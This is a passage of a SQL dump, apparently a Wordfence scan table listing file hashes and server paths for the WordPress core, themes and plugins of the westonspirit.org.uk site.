html/wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a3997a3c82920d5a319ccd7727232fc11478b38e','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/import-export/wp-cli.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a3a2fa25db6724b6e6abc176de074c00de82e3d8','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a3a8e8bba479351718d3929a98621ed2649f286d','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/base-ui.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a3afcef2b494de97d9ef719c8c9c533e50c585f6','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a3c6c36903c51668df38b31af2d93597132d01d8','/home/westonspirit.org.uk/public_html/wp-admin/post.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a3d7105cb1e0d01608b2578ab79df82b33359894','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/base/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a3d7a146bb4fda42db3e039eea69d1fdb2a41a3b','/home/westonspirit.org.uk/public_html/wp-includes/pomo/po.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a4167050c9541aa249e97cd9c2cedaf37c912692','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/cerber-addons.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a4237eea494c4754ec59408bd5a38e547d452512','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/import-export/directories/post-type.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a425b708ecd33edbe053650bc444e9aedbe73d5d','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Session.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a42782f0aae622b892b398390eb8e90f234497c0','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-error.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a434074c5f2b936361ac8b3bb2cab3e74dbf009d','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Cache/Memcache.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a43e874ca647165770a32aa223c443ea730892c3','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a43fbd1aeff934ee1dfa6f52493e8d64f9689020','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-link.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a455ba5cc7c88de91ca009e25134e1791c56b6d5','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/page-templates/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a45f9df5ed9b4df9d108b1455e5a0882fbefa85d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a468be53742c382ca1cbb465035bf3b6474a3d71','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a497beff4dbe120dbee7db3de6e95ca11feb3d13','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/groups/box-shadow.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a543f0cb84a6ae94860dac218f3eedbea1e5d7db','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-require-2fa.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a59ddd5d38aba6075256704ca05d30b7031a8606','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/landing-pages/documents/landing-page.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a5a1901d28988f5c671db7439d2d7e9698e12248','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/api/api-import.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a5a9899a1aa93c7e387201a124b1cb5117f4e62f','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/kits/views/panel.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a5b1cdcb5275d2ad9d7324992f7353f61991f999','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/library/documents/not-supported.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a5d551b21fcdb6f23d1b219d88a589d3092642b9','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a5eecc704bb6c9225761adac10490c350536dc65','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-configReadable.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a5f721775c2b271d95c5f4d2f2c5f86f0e694153','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a601a05a23b6f44b83efd9dae0c8e173fee448c1','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfDiagnostic.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a606bea6b77d2ec8165ca3b26ef02e90497124aa','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/database/database-status.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a6279838e7754b429296cef58a7befef936bc075','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/settings/settings-page.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a6338ad5d785f441eab5d20cd9bee03257639953','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a65b307cffdec1bebaca84bc145623f74555c14d','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/XChaCha20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a689326d583b01b1b71203bd2d34c1fd30211055','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/cerber-scanner.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a68b38be547b6c38ae69ebbb2c4baf35a5c70176','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/tours/login-security.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a6928335e243907c9384594235866b95862a1844','/home/westonspirit.org.uk/public_html/wp-includes/block-patterns.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a697263b5f34f02976dec7ab59dfdbb2b9e1c02d','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-customize-manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a6aa205110e31292fb8c65c7dc1e7e356c5b7355','/home/westonspirit.org.uk/public_html/wp-includes/feed-atom.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a6ba27e7aacb9d2daf1da5ee52e7aecb59b832a3','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-privacy-requests-table.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a6ba60a6b5d55fa6e5a98ff038608d4a52066b47','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-file-upload-upgrader.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a6bb34a3733c255397b83bde55c0fa100027e0fb','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-deactivation-tasks.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a70f4009f2add2bb8b8408e73474ff929182c95c','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-audio.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a720b3a240c97d7a4a90c5ba8e44019b61579297','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a7346ae9e4b6516f0d0d13545e60be081e79242f','/home/westonspirit.org.uk/public_html/wp-admin/user/index.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a76ab0ad5d3f1a46d5bb964f38d351098eb92437','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a76f98d66801aa7cea612a18fe77f288d0694a3f','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-tax-query.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a7b2edcb2551488faf3e8a80be5ba1d21c8fc89a','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Copyright.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a7d08e931cc27c369b27b8fc98cb2f65885be6ba','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Cache/Memcached.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a7efcf9df8d612960ec3cb845c597dd07bd94666','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a800cd2432501e667709f45b5c65d9559a4ea7ad','/home/westonspirit.org.uk/public_html/wp-includes/spl-autoload-compat.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a80f0629f6184e1d19c32707b12667f26aca4b16','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a84320d399c935eb3665d77e54c78419bcc2c0ca','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-bot-protection.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a848cee70ba9d063df0ca06ebc22b16b4e4af061','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a871b81602e9673e8291b6deb46738e96ac149ee','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/X25519.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a8aed99d5e5c42254e0cd0bfe8866b7159aedf4e','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/request.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a8b6ee5ea885585a47c32e8d5cea51024388833e','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/dynamic-tags/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a8c102f70605e003b7c13a3cc96237006ac0bc8d','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-htaccess.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a8ec27485c189b02b2fc52354c8e51856ebc7d0b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a8f8c2bd19cb62e688c35b437d9b51fa83247b80','/home/westonspirit.org.uk/public_html/wp-includes/blocks/search.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a9158f524e8283a22c64fef78d18a37061c0e1bc','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-bulk-plugin-upgrader-skin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a947eda8b8d62051f715431d8bee73cce8394919','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/matches/ip.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a96d57ede219515b050fc7722335f97f6bbb6a02','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/class-wp-rest-response.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a995b53c6e37b8065c1cee2e91156cfe751bbeee','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-oembed-controller.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a995f940a27f7850c87fa24e63b08250150843c0','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/importer.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a9ad4d2ae620e3643594289e56d1afebdfed7f1d','/home/westonspirit.org.uk/public_html/wp-includes/blocks/latest-comments.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a9b411dbd8b982a72f3fd1c51e6fa2f46beaf6f0','/home/westonspirit.org.uk/public_html/wp-admin/includes/import.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a9b6828907a2e623d62506ebee831c81ddf05b7f','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Response.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a9c27126ef28641c61b30755f85a905101373944','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a9ee33cb0348bcaf0b793ec2c39cf083eed93fcc','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'aa3518b799c5fd2e273c4ac11abc116a59a9a49f','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Transport/cURL.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'aa36b984610a196cf28895c71ef18647b5af4fb7','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/kit-library/connect/kit-library.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'aa401c81fbd584bb7839868fa4aa441396119258','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'aa5e75726e772743f51d9395a048e5f457120273','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/header/site-nav.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'aabddd3687359f4e3e97ffc8a3a761f94eeea5f8','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/counter.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ab6c98a63c8a2d244121b3edd193372dd4f4e00e','/home/westonspirit.org.uk/public_html/wp-includes/http.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ab75f78044cf935292514743eecf8856a7e05a3a','/home/westonspirit.org.uk/public_html/.htaccess',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ab767a007ca26fd05ea7dd4603970e534bf0915d','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/wp-cli/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'abd95cec0da5190013036bb55f98de8a1766927b','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/icon-box.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'abf742ab5e4fd9aeda896cd9950a8ffb44cd08b8','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/504.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ac47cde1dd75d0a993c091298ec373c82d0527ca','/home/westonspirit.org.uk/public_html/wp-includes/comment.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ac5202e8b4d6efbf3003bd938ba1a590d2a6e851','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/color.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ac5be05188833f27e0307d2b2d0b2a267c9a0ff9','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ac89ea9964d554d8310a91e10a638ebae339809d','/home/westonspirit.org.uk/public_html/wp-content/plugins/disable-gutenberg/inc/classic-editor.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ac98ca5eadbcbe3652184f3b13c1a98da3ca3b11','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'acd29364c279e3425b886b54f611c3271c23f95d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/options/option-token.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'acd8b6628073c7e11dcb86b9e71554e4b4e50cd6','/home/westonspirit.org.uk/public_html/wp-admin/edit.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ad1076cef24e9cb7f891e60485f376c51bb0cb1b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ad46ae5d411c95b666e89cf274d0b8f182f932ad','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/editor/data/globals/controller.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ad5e3c078c6caaae952df4894ff06866310b22a0','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/options-group-general.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ad9ef31089acd41546c14a1bcf5a0c6c9791689e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ae104112ea450d111eb5390226c5c4044f536a5c','/home/westonspirit.org.uk/public_html/wp-admin/user-new.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ae2f88673f1389ebf9fdfdfa8b8426738e412545','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/editor-templates/global.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'aece2855c783c8e055ce37c88d893cafab51ec08','/home/westonspirit.org.uk/public_html/wp-admin/themes.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'aef01de9d2ed7f502a40a9e36e24680c7fca1122','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/406.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'aef6da0033539d2e4528dfde1fcfa1aff3be2b13','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'af10b7a3db0f8a01f749986c165a45637106ef68','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'af2d3ede250dd4e9f677a0d4b5a01380e73009e6','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/settings/manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'af3f168792a8b557b8c2df0e3407991c213a08d7','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/waf/pomo/translations.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'af6251d1bc9ee0f1a7b08c78333e219164acdeda','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'afb110bd679d5181a631d8301f53f826786f283a','/home/westonspirit.org.uk/public_html/wp-admin/tools.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'afb838ab5620598e259dc45366565a52108ca940','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/common/modules/finder/categories-manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'afbff8e6ff3c7424b43752e19d70391f252d1863','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-stop-users-enumeration.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'afcef0f041ee448c633ac261dcc4fbfa3f03fa3d','/home/westonspirit.org.uk/public_html/wp-includes/cron.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'afcff2feaa607646dedc50dfaaacc194480207b9','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/templates/template-cover.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b000c703e8c86437aceaba4db72c470115532d83','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/inc/starter-content.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b02f4fd6a292fb06e9c82e233387dae1e3c179fa','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b04811eebb12ef082577478226ac1e30b81c3958','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/File.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b054b8fdb7ffa1b665dacd1b772a77da263b5688','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b0624188ed491247cc0d2ebb4849e0c6567f8b4c','/home/westonspirit.org.uk/public_html/wp-includes/ms-default-filters.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b06f08e8e80fa2b40e2ef0d202316b2765ba1195','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/410.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b07217ca191253555290da08b5d6bed3092b96eb','/home/westonspirit.org.uk/public_html/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b07b5283120937098a673b495e8fcbc46b7841d0','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/email_genericAlert.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b0bdb356d379179130cdf3455e552f3fbe70a1be','/home/westonspirit.org.uk/public_html/wp-content/plugins/akismat/akismet.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b0da7303ffd1959bb7a5213a40b45f30bd4b81c4','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/compatibility.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b1043c3bd73267d81a9eddcfe5bfad093d991d68','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b12e44135ccd349cdefe68adb156befe00088a3f','/home/westonspirit.org.uk/public_html/wp-admin/options-media.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b13da401abd39a409c9af2ca4ff697cadf23e012','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/base-units.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b17afb4c22d468e3f4d54e0950cb9844fdb99c54','/home/westonspirit.org.uk/public_html/wp-admin/load-styles.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b1807c49d7a0e339bbaf63b3271f66d4cba8123b','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/files/manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b1a120f3cc2b06469bee76806cd9d21320ecfa37','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/database/schema/231.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b1b189331cc96cdc60ac6accd046c49dd865e664','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b1b41ea258f7259ce60b01eae703184bc512a311','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/header/site-branding.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b1cd59d236b0d50c9b2f0d156517bd2817ed4bc6','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/waf/pomo/streams.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b2250d6f6f7c838a9430d5a4e51ed3b8da4cd9bb','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/settings/page/model.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b22b5a1e08a7f78490086d4c562de62477a62680','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/template-library/sources/local.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b261966e3c7edeecda18f0cde1f4269218c91abd','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Crypto.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b26d8ed6dca220215049ca778f590601560fbbd0','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/429.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b27d59d5ae352831a58fbcfc401d9448fe11e111','/home/westonspirit.org.uk/public_html/wp-includes/widgets/class-wp-widget-links.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b295dd3f2f25347ca34a03122e2e98b4deb2cc13','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/popover-toggle.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b2a7b7a3317d83a153f80cdc84df8c995fbbe45c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/nexus/cerber-slave-list.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b2ee79de0c29690802ae0a38b925dd77c77601a6','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/sysinfo.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b30a4d8c27bf171e44c4f059efefae8a98036b15','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b314ae3e9c768e3b08b492742e609eec9221ff5c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wordfenceScanner.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b3323b9f7e675012d085e8ddbaea574f6adfa992','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b332d7e3b2ed9cef1d3f2fd8b1c14df2591f62b8','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b337685af8974f0f38c9ce057d56378ba8772aac','/home/westonspirit.org.uk/public_html/wp-admin/includes/network.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b357561fca66358de01e3b18c57d6a837ca1be9f','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b36dda7b2e0b808caee97709ef2ca5ebff736111','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'b36e618fe796404ab7f3b1c0aa3ca7c891c0d6f5','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php',0,''